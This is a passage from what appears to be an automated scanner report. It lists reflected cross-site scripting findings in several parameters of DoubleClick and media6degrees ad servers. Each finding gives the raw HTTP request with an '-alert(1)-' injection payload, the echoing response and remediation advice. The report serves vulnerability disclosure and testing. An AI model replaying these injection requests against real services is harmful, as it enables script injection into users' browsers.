Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 472
Date: Tue, 28 Jun 2011 02:54:16 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b34/c/aa/%2a/e;240570459;1-0;0;61251276;4307-300/250;41112510/41130297/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750c83d2'-alert(1)-'90040ac53db&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694">
...[SNIP]...

1.129. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d2cd'-alert(1)-'e6902756722 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c3065308d2cd'-alert(1)-'e6902756722&redirect=;ord=29076741809768234? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Date: Tue, 28 Jun 2011 02:55:12 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c3065308d2cd'-alert(1)-'e6902756722&redirect=http%3a%2f%2fwww.nylaarp.com/694\">
...[SNIP]...

1.130. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7251'-alert(1)-'2917f9be78f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=a7251'-alert(1)-'2917f9be78f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:55:32 GMT
Expires: Tue, 28 Jun 2011 02:55:32 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=a7251'-alert(1)-'2917f9be78fhttp%3a%2f%2fwww.nylaarp.com/694\">
...[SNIP]...

1.131. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca11'-alert(1)-'054d5ab12e9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234dca11'-alert(1)-'054d5ab12e9&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=29076741809768234? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Date: Tue, 28 Jun 2011 02:54:01 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
p://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/aa/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234dca11'-alert(1)-'054d5ab12e9&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694\">
...[SNIP]...

1.132. http://ad.doubleclick.net/adj/x1.rmx/discovercard/ron/chrome [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rmx/discovercard/ron/chrome

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d32f1'-alert(1)-'db921ef1f73 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rmx/discovercard/ron/chrome;click=d32f1'-alert(1)-'db921ef1f73 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABd2n4AAAAAAJ47IAAAAAAAAgHEAQIAAAAAAP8AAAACF3MOLwAAAAAAJFcQAAAAAAC2cioAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAACD.ZsmR0D8AAAAAAADgPwAg.2bJkdA.AAAAAAAA4D8AIP9myZHgPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqr.3wsyhSChO5NIUITUL5EI6ZvSaAnRprgrLyAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3937226629%26r%3D0%26s%3D1887835,04ab044a-a133-11e0-b5c3-1cc1de04b208
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 3286
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:02:39 GMT
Expires: Tue, 28 Jun 2011 03:02:39 GMT

document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Wed Feb 03 10:54:52 EST 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
ercard.com/credit-cards/cardbuilder/index.html?iq_id=o1112';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/1796512/CB728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'd32f1'-alert(1)-'db921ef1f73http://discovercard.com/credit-cards/cardbuilder/index.html?iq_id=o1112';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/1796512/CB728x90.swf';
var dcminversion = '9';
var d
...[SNIP]...

1.133. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62ac5"-alert(1)-"553f8be859b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserv/cs?tId=9141931727447453|cb=1309227831|adType=iframe|cId=7020|ec=1|spId=35731|advId=1245|exId=23|price=AAABMNQPUWpv6BqnAEfS1VfFyXUVlO77yhoqvw|pubId=118|secId=859|invId=1050|notifyServer=asd148.sd.pl.pvt|notifyPort=8080|bid=2.15|srcUrlEnc=http%3A%2F%2Fwww.marketbuy54.com&62ac5"-alert(1)-"553f8be859b=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lluut6160d5mnk030t602geonZLOWd01mfumewHAhOFkX01md2032u01vvqV0QK5K018qqm2mj01VqkN5H43s017kjb472e012mj01VqoCRKnha017kje59iw010t602U5VzBCfEH000duhMllYZOUL10000eh3j3r010t602Ux0lBKWOP000dnnNsf4RBHGo0002704kzp010t601OnK3JLpHn0003of3ftm010t601NLfLZBxCP0001cz5ga6010t601M1fYxCfX+0000sx4tm1010t601M0QkBMuNQ0000rt4qk0010t601Ms7JhMtyT0000l53ncx010t601MePkBCfDV00007s5awn010t601MbzDxPdaX00005k4th1010t601Mak3hDIUX00004g5gty010t601MVrdZPDCo000000; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w2a31b02k4y060r0760y; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Set-Cookie: orblb=2ll8nk2072gh20u021a7x60opab0w010opc82k810v010xuvq23a10u010ps6m27y11e0109x0q2gu10u0300zeq00z1q00yg11zw10u0200z2400yjk1y510u0100000; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Set-Cookie: rdrlst=...[SNIP]...; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Set-Cookie: sglst=21l0s9eslluut60000001s4y060r0760yef6lmq6u304o7h0014k000p00600ey7lmq6u30jdl700e4y060r0760e0ixlljn151e0xe0254y060r0760yefjlmq6u30jdl700n4y060r0760ndsolmq6u30jdl700e4u000q00600bzvllikks1yq350264y060r0760yexulmq6u30jdl700e4y060r0760edlell9l281zzd202d4y060r0760yejelmq6u30d26700a4q000q00600e0vllnepl1m5pp01q4u000q006009uklljn151fxf201n4o000p0060090ill9m0327onu02e4y060r0760ybvdlljn151pxe50254y060r0760ydz4lmq6u309dm40064o000p0060056blljn151pxe50214y060r0760j1jzll8nk228n3v02j4y060r0760yecwlmq6u30d2670064q000q006003a6lm51zz1c8ny00x4y060r0760x5l3lluv0y0000001m4y060r0760yecklmq6u30jdl700i4y060r0760if7wlmxnyj0bwgr00i4y060r0760if7xlmq6u304o7h0014k000p00600ag2lle7v6232sr0274y060r0760yet0lmq6u30jdl70094u000q00600ekglmq6u304o7h0014k000p00600edxlmq6u30jdl70054u000q006005nkllnepl1c5qm01j4o000p006009mkllnepl1a98y01h4n000p00600awxln2fck0000000e4y060r0760ecwallnepl1c5qm01j4o000p00600ekzlmq6u30jdl700n4y060r0760nbo8lle7v61lcl101q4o000p00600b3jlmivh80yf6p00p4y060r0760p690lle7v61vck401t4y060r0760aevalmq6u304o7h0014k000p00600ehslmq6u30jdl700n4y060r0760neyzlmxnyj01who0014o000p00600ebblmq6u30jdl700n4y060r0760neyylmq6u30d2670054q000q00600ef0lmq6u30jdl700i4y060r0760ieyvlmq6u30jdl700e4y060r0760ees4lmq6u30jdl700n4y060r0760nfcclmxnyj0bwgr00i4y060r0760i9wvlljn151pxe50254y060r0760yf1wlmq6u30jdl700e4u000q00600eeplmq6u30jdl700n4y060r0760n0tille7v6232sr0274y060r0760yes0lmq6u30jdl700a4y060r0760a45mlluuyq0000001o4y060r0760yerzlmxnyj0bwgr0094u000q006005jillnepl1c5qm01i4o000p00600ezblmxnyj01who0014o000p00600e0wlmq6u304o7h0014k000p00600ee8lmq6u30jdl700e4u000q00600ez9lmq6u30jdl700a4y060r0760a9gellnepl1m5pp01r4u000q00600; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Set-Cookie: vstcnt=418b010r1m4me19103210k24ehss103210c24nwh0103210u24fw8l103210t24fi35103210624fs4z103210z24ty31218e10i203210m24egq3218e10q203210x24fu9b218e10q203211024gcxb103210c24fclw103210x24f1fr103210c24fn0j103210324omy7103210y24b47b103210624uz3i10pm10t2459ao103210324ncl2218e10q203210y2455ue103210x24b1xk14tl21221624fu43103210c24wnrf218e115203250220620820921424ebm7103210k24vx8f127p10224fank103210324o5u1103211424tfmw1032100249ujm103210t2450o6103210024fub8103211024rylh103211124uyyu103211424n5kn20pm10c203210024eu86218e10p203210s24sqj810321002453dh103210324u1er218e200202203210324elor218e108203210a24k5jb10pn10c24ferm103211424ferl1032114248umb103210w24mwjf103210m24rm27218e108203210824hgi910321132496o0218e100203210024ef19103210w24p056103210024ep9z218e10q203210v24q28r218e108203210g24mtp4103210024j2vl103211024rcz8218e102203210624h6d7103211424qfys103210t24qqy7127p20020224ffmk103210024dx7s103210m2; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 28 Jun 2011 02:23:56 GMT
Connection: close
Content-Length: 2380

<IFRAME SRC="http://ad.doubleclick.net/adi/N4848.137909.MEDIA6DEGREES/B5113302.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=9141931727447453|cId=7020|cb=1309227831|notifyPort=8080|ex
...[SNIP]...
<script language="JavaScript">
(new Image(0,0)).src = "http://audit.303br.net?anId=40&pubId=1050&advId=35731&campId=4222&vURL=http%3A%2F%2Fwww.marketbuy54.com&62ac5"-alert(1)-"553f8be859b=1";
</script>
...[SNIP]...

1.134. http://ad.media6degrees.com/adserv/cs [tId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the tId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45282"-alert(1)-"e2957ef1876 was submitted in the tId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserv/cs?tId=9141931727447453|cb=1309227831|adType=iframe|cId=7020|ec=1|spId=35731|advId=1245|exId=23|price=AAABMNQPUWpv6BqnAEfS1VfFyXUVlO77yhoqvw|pubId=118|secId=859|invId=1050|notifyServer=asd148.sd.pl.pvt|notifyPort=8080|bid=2.15|srcUrlEnc=http%3A%2F%2Fwww.marketbuy54.com45282"-alert(1)-"e2957ef1876 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=016020a0e0f0g0h1ll77mmxzt122csoxzt1271kbxzt1271kbxzt122csoxzt1271kb; ipinfo=2lnh7v60zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; adh=1lluut6160d5mnk030t601ewHAhOFkX01md2032u01vvqV0QK5K018qqm2mj01VqkN5H43s017kjb472e012mj01VqoCRKnha017kje59iw010t602U5VzBCfEH000duhMllYZOUL10000eh3j3r010t602Ux0lBKWOP000dnnNsf4RBHGo0002704kzp010t601OnK3JLpHn0003of3ftm010t601NLfLZBxCP0001cz5ga6010t601M1fYxCfX+0000sx4tm1010t601M0QkBMuNQ0000rt4qk0010t601Ms7JhMtyT0000l53ncx010t601MePkBCfDV00007s5awn010t601MbzDxPdaX00005k4th1010t601Mak3hDIUX00004g5gty010t601MVrdZPDCo000000; clid=2ll77mm01171voofy6a0tk1w2a31302h4y030r0460v; orblb=2ll8nk2072gh20u021a7x60opab0w010opc82k810v010xuvq23a10u010ps6m27y11e0109x0q2gu10u0300zeq00z1q00yg11zw10u0200z2400yjk1y510u0100000; rdrlst=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; sglst=21l0s9eslluut60000001p4y030r0460vef6lmq6u304o7h0014k000p00600ey7lmq6u30jdl700b4y030r0460b0ixlljn151e0xe0224y030r0460vefjlmq6u30jdl700k4y030r0460kdsolmq6u30jdl700e4u000q00600bzvllikks1yq2x0234y030r0460vexulmq6u30jdl700b4y030r0460bdlell9l281zzd202a4y030r0460vejelmq6u30d26700a4q000q00600e0vllnepl1m5pp01q4u000q006009uklljn151fxf201n4o000p0060090ill9m0327onm02b4y030r0460vbvdlljn151pxe50224y030r0460v56blljn151pxe501y4y030r0460gdz4lmq6u309dm40064o000p006001jzll8nk228n3n02g4y030r0460vecwlmq6u30d2670064q000q006003a6lm51zz1c8nq00u4y030r0460u5l3lluv0y0000001j4y030r0460vecklmq6u30jdl700f4y030r0460ff7wlmxnyj0bwgr00f4y030r0460ff7xlmq6u304o7h0014k000p00600ag2lle7v6232sj0244y030r0460vet0lmq6u30jdl70094u000q00600ekglmq6u304o7h0014k000p00600edxlmq6u30jdl70054u000q006005nkllnepl1c5qm01j4o000p006009mkllnepl1a98y01h4n000p00600awxln2fck0000000b4y030r0460bcwallnepl1c5qm01j4o000p00600ekzlmq6u30jdl700k4y030r0460kbo8lle7v61lcl101q4o000p00600b3jlmivh80yf6h00m4y030r0460m690lle7v61vck401q4y030r04607evalmq6u304o7h0014k000p00600ehslmq6u30jdl700k4y030r0460keyzlmxnyj01who0014o000p00600ebblmq6u30jdl700k4y030r0460keyylmq6u30d2670054q000q00600ef0lmq6u30jdl700f4y030r0460feyvlmq6u
30jdl700b4y030r0460bes4lmq6u30jdl700k4y030r0460kfcclmxnyj0bwgr00f4y030r0460f9wvlljn151pxe50224y030r0460vf1wlmq6u30jdl700e4u000q00600eeplmq6u30jdl700k4y030r0460k0tille7v6232sj0244y030r0460ves0lmq6u30jdl70074y030r0460745mlluuyq0000001l4y030r0460verzlmxnyj0bwgr0094u000q006005jillnepl1c5qm01i4o000p00600ezblmxnyj01who0014o000p00600e0wlmq6u304o7h0014k000p00600ez9lmq6u30jdl70074y030r04607ee8lmq6u30jdl700e4u000q006009gellnepl1m5pp01r4u000q00600; vstcnt=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lluut6160d5mnk030t602geonZLOWd01mfumewHAhOFkX01md2032u01vvqV0QK5K018qqm2mj01VqkN5H43s017kjb472e012mj01VqoCRKnha017kje59iw010t602U5VzBCfEH000duhMllYZOUL10000eh3j3r010t602Ux0lBKWOP000dnnNsf4RBHGo0002704kzp010t601OnK3JLpHn0003of3ftm010t601NLfLZBxCP0001cz5ga6010t601M1fYxCfX+0000sx4tm1010t601M0QkBMuNQ0000rt4qk0010t601Ms7JhMtyT0000l53ncx010t601MePkBCfDV00007s5awn010t601MbzDxPdaX00005k4th1010t601Mak3hDIUX00004g5gty010t601MVrdZPDCo000000; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w2a31702k4y060r0760y; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Set-Cookie: orblb=2ll8nk2072gh20u021a7x60opab0w010opc82k810v010xuvq23a10u010ps6m27y11e0109x0q2gu10u0300zeq00z1q00yg11zw10u0200z2400yjk1y510u0100000; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Set-Cookie: rdrlst=...[SNIP]...; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Set-Cookie: sglst=21l0s9eslluut60000001s4y060r0760yef6lmq6u304o7h0014k000p00600ey7lmq6u30jdl700e4y060r0760e0ixlljn151e0xe0254y060r0760yefjlmq6u30jdl700n4y060r0760ndsolmq6u30jdl700e4u000q00600bzvllikks1yq310264y060r0760yexulmq6u30jdl700e4y060r0760edlell9l281zzd202d4y060r0760yejelmq6u30d26700a4q000q00600e0vllnepl1m5pp01q4u000q006009uklljn151fxf201n4o000p0060090ill9m0327onq02e4y060r0760ybvdlljn151pxe50254y060r0760ydz4lmq6u309dm40064o000p0060056blljn151pxe50214y060r0760j1jzll8nk228n3r02j4y060r0760yecwlmq6u30d2670064q000q006003a6lm51zz1c8nu00x4y060r0760x5l3lluv0y0000001m4y060r0760yecklmq6u30jdl700i4y060r0760if7wlmxnyj0bwgr00i4y060r0760if7xlmq6u304o7h0014k000p00600ag2lle7v6232sn0274y060r0760yet0lmq6u30jdl70094u000q00600ekglmq6u304o7h0014k000p00600edxlmq6u30jdl70054u000q006005nkllnepl1c5qm01j4o000p006009mkllnepl1a98y01h4n000p00600awxln2fck0000000e4y060r0760ecwallnepl1c5qm01j4o000p00600ekzlmq6u30jdl700n4y060r0760nbo8lle7v61lcl101q4o000p00600b3jlmivh80yf6l00p4y060r0760p690lle7v61vck401t4y060r0760aevalmq6u304o7h0014k000p00600ehslmq6u30jdl700n4y060r0760neyzlmxnyj01who0014o000p00600ebblmq6u30jdl700n4y060r0760neyylmq6u30d2670054q00